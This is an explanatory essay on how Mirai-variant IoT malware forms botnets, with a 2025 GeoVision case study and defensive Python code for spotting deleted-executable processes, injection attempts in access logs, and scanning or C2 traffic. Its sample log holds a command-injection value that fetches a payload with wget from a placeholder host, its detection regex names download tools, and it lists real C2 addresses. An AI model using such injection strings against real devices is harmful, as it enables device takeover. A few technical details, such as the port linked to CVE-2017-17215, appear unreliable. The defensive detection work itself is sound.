The proliferation of Internet of Things (IoT) devices has reshaped connectivity but also created a fertile ground for cybercriminals to exploit. IoT malware, such as Mirai and its variants, leverages the vulnerabilities inherent in these devices to form large-scale botnets—networks of compromised devices controlled remotely for malicious purposes, primarily Distributed Denial of Service (DDoS) attacks, cryptojacking, and data theft. Since its emergence in 2016, Mirai has become a blueprint for IoT botnets, with its open-source code spawning numerous derivatives like Satori, Okiru, and CatDDoS. This essay explores the mechanisms by which IoT malware forms large-scale botnets, focusing on infection vectors, propagation, command-and-control (C2) infrastructure, and evasion tactics. It also provides a critical example to illustrate their real-world impact, drawing on 2025 cybersecurity trends and insights from web sources and X posts.
Mechanisms of Large-Scale Botnet Formation
IoT malware like Mirai variants forms botnets through a systematic process that exploits the weak security of IoT devices, scales rapidly, and maintains resilience. Below are the key mechanisms:
1. Scanning for Vulnerable Devices
Mirai’s botnet formation begins with continuous, wide-ranging scans of the internet to identify vulnerable IoT devices. These scans target devices with open ports, particularly:
- Telnet Ports (23, 2323): Commonly used for remote administration, these ports expose devices to brute-force attacks. Mirai scans for devices with default or weak credentials, such as “admin/admin.”
- HTTP/HTTPS Ports (80, 443, 8080, 8443): Used for web interfaces, these ports allow attackers to exploit vulnerabilities in device firmware.
- Other Ports: Variants like Satori target ports associated with specific vulnerabilities, such as port 7547 for SOAP-based router exploits (CVE-2017-17215).
Mirai’s scanning is efficient, probing thousands of IP addresses per second to maximize discovery. Devices running Linux-based operating systems, especially those built on ARC processors, are prime targets because of their prevalence in IoT ecosystems (e.g., routers, IP cameras, DVRs).
Botnet Impact: This aggressive scanning ensures a rapid accumulation of potential bots, enabling botnets to grow to hundreds of thousands of devices, as seen with Mirai’s peak of 600,000 infections in 2016.
2. Infection via Credential Attacks and Exploits
Once a vulnerable device is identified, Mirai infects it through:
- Brute-Force Credential Attacks: Mirai attempts to log in using a hardcoded list of 61–64 common default username/password combinations (e.g., “root/12345”). If successful, it deploys the malware payload. This method exploits consumer neglect, as many users fail to change factory settings.
- Vulnerability Exploitation: Modern Mirai variants, like CatDDoS, exploit known vulnerabilities, such as CVE-2024-6047 in GeoVision devices or CVE-2020-10173 in Comtrend routers. These exploits allow remote code execution without credentials.
- Command Injection: Variants like Satori and Mukashi use command injection flaws (e.g., CVE-2020-9054 in Zyxel devices) to execute malicious scripts.
Upon infection, the malware downloads a binary tailored to the device’s architecture (e.g., ARM, MIPS, x86), ensuring compatibility across diverse IoT platforms.
Botnet Impact: The dual approach of credential attacks and exploits maximizes infection rates, creating a diverse botnet capable of scaling to millions, as seen with Bashlite’s estimated one million enslaved devices.
3. Malware Deployment and Self-Propagation
After infection, Mirai transforms the device into a bot by:
- In-Memory Execution: Mirai resides in volatile memory, avoiding disk writes to evade file-based detection. A simple reboot clears the infection, but reinfection is likely if vulnerabilities persist.
- Self-Deletion and Concealment: The malware deletes itself from the filesystem, alters its process name to a random string, and hides from process lists to avoid detection.
- Competition Blocking: Mirai kills processes associated with competing malware or botnets, ensuring exclusive control of the device.
- Self-Propagation: Infected devices scan for new targets, creating a self-sustaining infection cycle. Each bot acts as a scanner and infector, exponentially growing the botnet.
Botnet Impact: Self-propagation enables rapid botnet expansion, with variants like Reaper compromising devices faster than the original Mirai.
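The self-deletion and in-memory residence described above leave one durable trace on a Linux host: the running process still exists, but its /proc/<pid>/exe link points at a path the kernel tags "(deleted)". The Python scan below is an added example (not code from the essay or any vendor) that hunts for exactly that; the proc_root parameter and the bot-like names used in its test are assumptions.

```python
"""Hunt for live processes whose on-disk executable has been unlinked.

Mirai-style bots delete their binary after launch and keep running from
memory, so /proc/<pid>/exe resolves to "<path> (deleted)". The proc_root
parameter lets the scan run over a constructed procfs layout for testing;
on a live host it defaults to /proc.
"""
import os
import re

DELETED_RE = re.compile(r" \(deleted\)$")


def _read(path):
    """Return a procfs file as text, or '' if it vanished or is unreadable."""
    try:
        with open(path, "rb") as f:
            return f.read().decode("utf-8", "replace")
    except OSError:
        return ""


def find_deleted_exe_processes(proc_root="/proc"):
    """Return sorted [(pid, comm, exe_path, cmdline)] for processes whose
    executable no longer exists on disk. comm is the kernel's short process
    name (what ps shows, and what Mirai randomises); cmdline is argv."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():          # skip self, sys, net, ... entries
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            target = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:                  # kernel thread, or no permission
            continue
        if not DELETED_RE.search(target):
            continue
        comm = _read(os.path.join(pid_dir, "comm")).strip()
        cmdline = _read(os.path.join(pid_dir, "cmdline")).replace("\0", " ").strip()
        findings.append((int(entry), comm, DELETED_RE.sub("", target), cmdline))
    return sorted(findings)


if __name__ == "__main__":
    for pid, comm, exe, cmdline in find_deleted_exe_processes():
        print(f"pid={pid} comm={comm!r} deleted_exe={exe} cmdline={cmdline!r}")
```

A deleted executable also shows up after a package upgrade replaces a binary that is still running, so treat each hit as a lead to correlate with the process name, its open sockets and outbound connections rather than as proof of infection.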
4. Command-and-Control (C2) Infrastructure
The botnet’s coordination relies on a robust C2 infrastructure:
- Centralized C2: In traditional Mirai botnets, infected devices report to a central C2 server, which issues commands for DDoS attacks, updates, or new scans.
- Peer-to-Peer (P2P) C2: Advanced variants use P2P architectures, where bots communicate directly, eliminating single points of failure. Examples include Trojan.Peacomm-inspired Mirai variants.
- Domain Generation Algorithms (DGAs): Mirai variants generate dynamic domains for C2 servers, evading domain blacklisting.
- Cloud-Based C2: Attackers leverage trusted cloud platforms like Azure to host C2 servers, blending with legitimate traffic.
Commands include launching DDoS attacks (e.g., HTTP floods, UDP floods, SYN floods), cryptojacking, or proxying malicious traffic.
Botnet Impact: A resilient C2 infrastructure ensures the botnet remains operational, even under mitigation efforts, enabling attacks like the 1.44 PB Mirai assault in 2024.
5. Scaling Through IoT Ecosystem Vulnerabilities
The IoT ecosystem’s inherent weaknesses fuel botnet growth:
- Weak Security: Many IoT devices lack robust security, with unencrypted firmware, open ports, and no auto-update mechanisms.
- Default Credentials: Manufacturers ship devices with predictable credentials, which users rarely change.
- Legacy Vulnerabilities: Unpatched devices remain exploitable for years, as seen with CVE-2017-17215 in Huawei routers.
- Device Proliferation: With over 17 billion IoT devices online in 2025, projected to reach 29 billion by 2030, the attack surface is vast.
- Homogeneous Platforms: Similar Linux-based architectures across devices simplify malware cross-compilation.
Botnet Impact: These vulnerabilities enable botnets to scale to unprecedented sizes, with Mirai variants like Wicked targeting diverse devices, from routers to CCTV-DVRs.
6. Evasion of Detection
Mirai variants employ tactics to avoid detection:
- Polymorphic Code: Variants like LZRD alter their code structure to evade signature-based antivirus.
- Encrypted Traffic: C2 communications use HTTPS or DNS tunneling, mimicking legitimate traffic.
- Low-Profile Attacks: Some variants launch low-volume HTTP floods to test capabilities without triggering alerts.
- Anti-Forensic Measures: Mirai wipes competing malware and clears logs to obscure its presence.
Botnet Impact: Evasion ensures botnets remain active, contributing to their longevity and scale, as seen with SYLVEON’s persistence in Taiwan.
Impacts of IoT Botnets
Large-scale IoT botnets have profound consequences:
- DDoS Attacks: Overwhelm targets with traffic, as seen in the 1 Tbps attack on OVH in 2016.
- Financial Losses: Downtime and mitigation cost organizations millions, with DDoS attacks averaging $1.6 million per incident in 2024.
- Data Theft: Botnets proxy traffic for phishing or credential stuffing, fueling identity theft.
- Cryptojacking: Satori variants mine cryptocurrencies, draining device resources.
- Infrastructure Disruption: Attacks on DNS providers like Dyn in 2016 crippled major websites.
- Regulatory Risks: Breaches violate regulations like GDPR or India’s DPDPA, risking fines.
These impacts highlight the urgency of securing IoT ecosystems.
Case Study: The 2025 GeoVision Mirai Variant Attack
A critical example of IoT malware forming a large-scale botnet is the 2025 Mirai variant attack targeting GeoVision IoT devices, reported by Akamai’s SIRT in April 2025.

Background
This campaign exploited command injection vulnerabilities (CVE-2024-6047, CVE-2024-11120) in discontinued GeoVision devices, such as IP cameras and DVRs, to deploy a Mirai-based botnet named “LZRD.” The attack surfaced in Akamai’s honeypots, marking the first active exploitation of these flaws since their disclosure in 2024.
Attack Mechanics
- Scanning: The botnet scanned for GeoVision devices with vulnerable /DateSetting.cgi endpoints, targeting HTTP ports.
- Infection: Exploiting CVE-2024-6047, attackers injected commands to download an ARM-based Mirai binary (“boatnet”) from a C2 server (176.65.144.253). The binary was made world-readable, -writable and -executable with chmod 777 and then run.
- Self-Propagation: Infected devices scanned for additional vulnerable GeoVision and TBK DVR devices, using brute-force Telnet attacks and other exploits (e.g., DigiEver flaws).

- C2 Communication: The botnet used a hardcoded C2 IP (209.141.44.28) for commands, supporting DDoS attacks like UDP floods, TCP SYN floods, and HTTP floods.
- Evasion: The LZRD variant employed polymorphic code and killed competing processes, evading antivirus detection.
- Botnet Scale: The campaign compromised thousands of devices globally, with significant activity in Asia and North America, forming a botnet capable of volumetric DDoS attacks.
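To show what the exploitation step above looks like from the targeted device's side, here is an added example (not Akamai's published rules and not the essay's own code): a Python checker that parses web-server access logs in the common combined format and flags requests to /DateSetting.cgi whose decoded query string carries shell syntax. The log lines, the tz parameter name and the C2-PLACEHOLDER host are constructed for the example; only the endpoint path comes from the case study.

```python
"""Flag HTTP requests that look like command injection against watched CGI endpoints."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One combined-format access-log line: client IP, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Shell metacharacters and download/execute verbs that have no business in a
# date/timezone parameter. Matched against the URL-decoded query string.
INJECTION_RE = re.compile(r"[;|`]|\$\(|&&|\b(wget|curl|tftp|chmod)\b")

# Endpoint abused in the GeoVision campaign; extend from vendor advisories.
WATCHED_CGI = ("/DateSetting.cgi",)


def is_injection_attempt(target):
    """True if the request targets a watched CGI and its decoded query carries
    shell syntax; False for ordinary parameter values or unwatched paths."""
    path, _, query = target.partition("?")
    if not path.endswith(WATCHED_CGI):
        return False
    return bool(INJECTION_RE.search(unquote_plus(query)))


def scan_access_log(lines):
    """Return {client_ip: count} of suspected injection requests."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_injection_attempt(m.group("target")):
            hits[m.group("ip")] += 1
    return dict(hits)


SAMPLE_LOG = [  # constructed: one benign client, one probing client
    '203.0.113.7 - - [12/Apr/2025:03:14:07 +0000] "GET /DateSetting.cgi?tz=UTC HTTP/1.1" 200 512',
    '198.51.100.9 - - [12/Apr/2025:03:14:09 +0000] "GET /DateSetting.cgi?tz=UTC;wget+http://C2-PLACEHOLDER/boatnet HTTP/1.1" 200 0',
    '198.51.100.9 - - [12/Apr/2025:03:14:11 +0000] "GET /DateSetting.cgi?tz=%60id%60 HTTP/1.1" 200 0',
    '203.0.113.7 - - [12/Apr/2025:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))  # {'198.51.100.9': 2}
```

A 200 status on a flagged request is worth treating as a probable compromise rather than a blocked attempt, since these CGI handlers return success whether or not the injected command ran.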
Response and Impact
Akamai published IOCs, Snort rules, and YARA signatures to aid defenders. Organizations were urged to patch devices, disable Telnet, and change default credentials. The attack disrupted corporate networks, with DDoS traffic affecting online services. In India, vulnerable GeoVision devices in smart cities risked infrastructure outages. Financial losses included mitigation costs and potential ransom demands, while stolen credentials fueled dark web sales. The campaign highlighted the persistence of Mirai variants, exploiting unpatched legacy devices.
Lessons Learned
- Patch Management: Apply firmware updates to close vulnerabilities like CVE-2024-6047.
- Credential Security: Replace default passwords with strong, unique ones.
- Network Segmentation: Isolate IoT devices to limit propagation.
- Threat Intelligence: Monitor IOCs to detect Mirai activity early.
- Device Retirement: Replace unsupported devices to avoid exploitation.
Mitigating IoT Botnets
To counter IoT malware and botnets, organizations and users should:
- Secure Credentials: Change default usernames and passwords, using random password generators.
- Patch Devices: Apply firmware updates promptly to address vulnerabilities.
- Disable Remote Access: Block Telnet and UPnP to prevent unauthorized access.
- Network Segmentation: Isolate IoT devices from critical systems.
- Deploy Anti-Malware: Use tools to detect and remove botnet malware.
- Monitor Traffic: Inspect HTTP/HTTPS and Telnet traffic for scanning or C2 activity using tools like Zeek.
- Use Threat Intelligence: Leverage services to track Mirai variants and IOCs.
- Reboot Devices: Clear in-memory malware, though preventing reinfection requires fixing the underlying vulnerabilities.
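The scanning pattern from section 1 and the traffic-monitoring and threat-intelligence advice above can be checked together over Zeek conn.log records. The Python below is an added example (not Zeek's own tooling and not the essay's code): it assumes a column-reduced conn.log with a #fields header, uses the two C2 addresses from the case study as its IOC list, and sets a deliberately low fan-out threshold so the constructed sample triggers.

```python
from collections import defaultdict

SCAN_PORTS = {23, 2323, 80, 443, 8080, 8443, 7547}  # ports the essay names
C2_IOCS = {"176.65.144.253", "209.141.44.28"}       # C2 IPs from the case study
FANOUT_THRESHOLD = 4    # distinct targets per source per window (demo value; raise in production)
WINDOW_SECONDS = 60


def parse_conn_log(text):
    """Yield one dict per record from Zeek TSV text, using the #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))


def detect(text):
    """Return (scanners, ioc_hits): sources whose fan-out on scan ports exceeds
    the threshold inside the window, and (src, dst) pairs that reached a C2."""
    per_src = defaultdict(list)   # src -> [(ts, dst)] for flows on scan ports
    ioc_hits = set()
    for r in parse_conn_log(text):
        src, dst, dport = r["id.orig_h"], r["id.resp_h"], int(r["id.resp_p"])
        if dst in C2_IOCS:
            ioc_hits.add((src, dst))
        if dport in SCAN_PORTS:
            per_src[src].append((float(r["ts"]), dst))
    scanners = set()
    for src, events in per_src.items():
        events.sort()
        lo = 0                     # sliding window over time-ordered flows
        for hi in range(len(events)):
            while events[hi][0] - events[lo][0] > WINDOW_SECONDS:
                lo += 1
            if len({d for _, d in events[lo:hi + 1]}) >= FANOUT_THRESHOLD:
                scanners.add(src)
                break
    return scanners, ioc_hits


SAMPLE_CONN_LOG = "\n".join([  # constructed, column-reduced conn.log; S0 = SYN with no reply
    "#fields\tts\tid.orig_h\tid.resp_h\tid.resp_p\tconn_state",
    "1744427640.1\t192.0.2.50\t198.51.100.1\t23\tS0",
    "1744427641.2\t192.0.2.50\t198.51.100.2\t23\tS0",
    "1744427642.3\t192.0.2.50\t198.51.100.3\t2323\tS0",
    "1744427644.5\t192.0.2.50\t198.51.100.4\t7547\tS0",
    "1744427650.0\t192.0.2.77\t209.141.44.28\t443\tSF",
    "1744427651.0\t192.0.2.10\t203.0.113.8\t80\tSF",
])
```

Calling detect(SAMPLE_CONN_LOG) returns 192.0.2.50 as a scanner (four distinct Telnet/TR-069 targets within five seconds) and the 192.0.2.77 to 209.141.44.28 flow as an IOC hit; a host that appears in both sets is a bot that has already checked in.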
Conclusion
IoT malware like Mirai variants forms large-scale botnets by scanning for vulnerable devices, infecting them via credential attacks and exploits, deploying self-propagating malware, and coordinating through resilient C2 infrastructure. Exploiting IoT ecosystem weaknesses—weak security, default credentials, and device proliferation—these botnets scale to millions, enabling devastating DDoS attacks, cryptojacking, and data theft. The 2025 GeoVision attack, leveraging Mirai’s LZRD variant, exemplifies their impact, compromising thousands of devices for DDoS campaigns. As IoT devices grow to 29 billion by 2030, securing credentials, patching vulnerabilities, and segmenting networks are critical to mitigate botnet threats. By addressing these vulnerabilities, organizations and users can disrupt the formation of large-scale botnets and protect the digital ecosystem in 2025 and beyond.